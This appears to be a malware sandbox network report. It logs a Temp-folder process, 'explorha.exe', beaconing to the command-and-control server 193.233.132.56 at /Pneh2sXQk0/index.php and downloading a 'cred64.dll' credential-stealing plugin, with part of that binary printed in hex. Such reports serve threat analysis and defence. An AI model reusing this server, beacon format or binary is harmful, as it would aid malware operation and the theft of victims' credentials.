                                                                                                    Apr 19, 2024 04:27:03.233387947 CEST8049805193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:03.233481884 CEST4980580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.236468077 CEST4980580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.236793995 CEST4980680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.483927965 CEST8049805193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:03.484020948 CEST8049806193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:03.484055996 CEST4980580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.484189987 CEST4980680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.484750032 CEST4980680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.732333899 CEST8049806193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:03.738102913 CEST8049806193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:03.738172054 CEST4980680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.849837065 CEST4980680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:03.850169897 CEST4980780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.094788074 CEST8049807193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.094876051 CEST4980780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.095149040 CEST4980780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.097254992 CEST8049806193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.097316027 CEST4980680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.339570999 CEST8049807193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.339741945 CEST8049807193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.339792013 CEST4980780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.342874050 CEST4980780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.343147993 CEST4980880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.587318897 CEST8049807193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.587389946 CEST4980780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.590962887 CEST8049808193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.591049910 CEST4980880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.591358900 CEST4980880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.839060068 CEST8049808193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.843533039 CEST8049808193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:04.843628883 CEST4980880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.961282969 CEST4980880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:04.961708069 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.208906889 CEST8049808193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:05.209089994 CEST4980880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.209357977 CEST8049809193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:05.209759951 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.210040092 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.457776070 CEST8049809193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:05.458318949 CEST8049809193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:05.458389044 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.464272022 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.712153912 CEST8049809193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:05.718180895 CEST8049809193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:05.718440056 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.834252119 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:05.834745884 CEST4981080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.082191944 CEST8049809193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.082256079 CEST4980980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.082961082 CEST8049810193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.083058119 CEST4981080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.083300114 CEST4981080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.332134008 CEST8049810193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.332905054 CEST8049810193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.332993031 CEST4981080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.339091063 CEST4981080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.340117931 CEST4981180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.584683895 CEST8049811193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.584835052 CEST4981180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.585163116 CEST4981180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.587445021 CEST8049810193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.587598085 CEST4981080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.829328060 CEST8049811193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.834055901 CEST8049811193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:06.834181070 CEST4981180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.943380117 CEST4981180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:06.943762064 CEST4981280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.188626051 CEST8049812193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.188927889 CEST4981280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.189158916 CEST4981280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.189500093 CEST8049811193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.189552069 CEST4981180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.433861971 CEST8049812193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.434369087 CEST8049812193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.434518099 CEST4981280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.445436001 CEST4981280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.446402073 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.690363884 CEST8049812193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.690675020 CEST4981280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.694333076 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.694603920 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.695106983 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.942697048 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.948261976 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.948618889 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.054871082 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.055298090 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.300291061 CEST8049814193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.300776958 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.300885916 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.302567005 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.302638054 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.316525936 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.319967985 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.545691013 CEST8049814193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.545897961 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.546319008 CEST8049814193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.550183058 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.568922043 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.570205927 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.570480108 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.819010973 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.824134111 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.824327946 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.943562031 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.943798065 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.183475018 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.183563948 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.183873892 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.192076921 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.192135096 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.423762083 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.423971891 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.424151897 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.428807020 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.429157972 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.668894053 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.668978930 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.672027111 CEST8049817193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.672137022 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.672518015 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.674988985 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.790683985 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.915292025 CEST8049817193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.915579081 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.039366007 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.039618015 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.039843082 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.288331985 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.289077044 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.289201021 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.292138100 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.292444944 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.538249016 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.538342953 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.539391041 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.540656090 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.540756941 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.784785032 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.789206028 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.789350986 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.898983955 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.899274111 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.143311977 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.143568993 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.144627094 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.144687891 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.146917105 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.390809059 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.391524076 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.391748905 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.394901037 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.395313025 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.638576984 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.638763905 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.642538071 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.642613888 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.642908096 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.890319109 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.900167942 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.900259018 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.009711981 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.010586023 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.255486012 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.255578995 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.261293888 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.261461020 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.265222073 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.510149002 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.510799885 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.510977030 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.215291977 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.215569019 CEST4982380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.460589886 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:13.462201118 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.464139938 CEST8049823193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:13.464221954 CEST4982380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.673649073 CEST8049744193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:13.676240921 CEST4974480192.168.2.4193.233.132.56

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • 193.233.132.56

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449735193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:03.920797110 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:04.165822029 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:04.167273998 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:04.416256905 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449736193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:03.924387932 CEST69OUTGET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1
                                                                                                    Host: 193.233.132.56
                                                                                                    Apr 19, 2024 04:26:04.173118114 CEST1289INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 1285632
                                                                                                    Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT
                                                                                                    Connection: keep-alive
                                                                                                    ETag: "65e464f9-139e00"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$^^^_^_^_2^W_^W_^W_^_^^C^_^_^X^^_^Rich^PEdie" RhP` Xx `(0p .text `.rdata@@.dataLD@.pdata(`@@_RDATA@@.rsrc @@.reloc0@B
                                                                                                    Apr 19, 2024 04:26:04.173166990 CEST1289INData Raw: 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 97 6e 11 00 48 8d 0d e0 bb 12 00 e8 d3 20 0c 00 48 8d 0d 0c 85 0f 00 48 83 c4 28 e9 cf f2 0c 00 cc cc cc 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 8f 6e 11 00 48 8d 0d b0 c2 12 00 e8 a3 20 0c 00 48
                                                                                                    Data Ascii: H(A HnH HH(H(A HnH HLH(H(AHnHs HH(oH(A H_nHC HH(?H(AHWnH HH(
                                                                                                    Apr 19, 2024 04:26:04.173206091 CEST1289INData Raw: 83 c4 28 e9 ef ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 4f 6c 11 00 48 8d 0d b0 b5 12 00 e8 c3 1b 0c 00 48 8d 0d cc 8b 0f 00 48 83 c4 28 e9 bf ed 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 2f 6c 11 00 48 8d 0d c0 bd 12
                                                                                                    Data Ascii: (H(AHOlHHH(H(AH/lHHH(H(A(HlHcHLH(_H(AHlH3HH(/H(AHkHHH(
                                                                                                    Apr 19, 2024 04:26:04.173252106 CEST1289INData Raw: 8d 0d 4c 92 0f 00 48 83 c4 28 e9 df e8 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 57 69 11 00 48 8d 0d a0 b7 12 00 e8 b3 16 0c 00 48 8d 0d 8c 92 0f 00 48 83 c4 28 e9 af e8 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 37 69 11
                                                                                                    Data Ascii: LH(H(AHWiHHH(H(AH7iHHH(H(AHiHSHH(OH(AHhH#HLH(H(AHhH`H
                                                                                                    Apr 19, 2024 04:26:04.173294067 CEST1289INData Raw: 00 e8 d3 11 0c 00 48 8d 0d 0c 99 0f 00 48 83 c4 28 e9 cf e3 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 cf 67 11 00 48 8d 0d b0 b8 12 00 e8 a3 11 0c 00 48 8d 0d 4c 99 0f 00 48 83 c4 28 e9 9f e3 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00
                                                                                                    Data Ascii: HH(H(A4HgHHLH(H(A(HgHsHH(oH(AHgHCHH(?H(A4HgHHH(H(A(HgH
                                                                                                    Apr 19, 2024 04:26:04.173331976 CEST1289INData Raw: c7 80 80 00 00 00 0f 00 00 00 88 50 68 48 89 90 98 00 00 00 48 c7 80 a0 00 00 00 0f 00 00 00 88 90 88 00 00 00 48 89 90 b8 00 00 00 48 c7 80 c0 00 00 00 0f 00 00 00 88 90 a8 00 00 00 48 89 90 d8 00 00 00 48 c7 80 e0 00 00 00 0f 00 00 00 88 90 c8
                                                                                                    Data Ascii: PhHHHHHHHHHH H8H@(HXH`HHxHhHHHH
                                                                                                    Apr 19, 2024 04:26:04.173372984 CEST1289INData Raw: 00 00 0f 00 00 00 88 90 c8 00 00 00 48 89 90 f8 00 00 00 48 c7 80 00 01 00 00 0f 00 00 00 88 90 e8 00 00 00 48 89 90 18 01 00 00 48 c7 80 20 01 00 00 0f 00 00 00 88 90 08 01 00 00 48 89 90 38 01 00 00 48 c7 80 40 01 00 00 0f 00 00 00 88 90 28 01
                                                                                                    Data Ascii: HHHH H8H@(HXH`HHxHhHHHHHHHHHH
                                                                                                    Apr 19, 2024 04:26:04.173414946 CEST1289INData Raw: 00 0f 00 00 00 88 90 28 01 00 00 48 89 90 58 01 00 00 48 c7 80 60 01 00 00 0f 00 00 00 88 90 48 01 00 00 48 89 90 78 01 00 00 48 c7 80 80 01 00 00 0f 00 00 00 88 90 68 01 00 00 48 89 90 98 01 00 00 48 c7 80 a0 01 00 00 0f 00 00 00 88 90 88 01 00
                                                                                                    Data Ascii: (HXH`HHxHhHHHHHHHHHH H8H@(HXH`HHxH
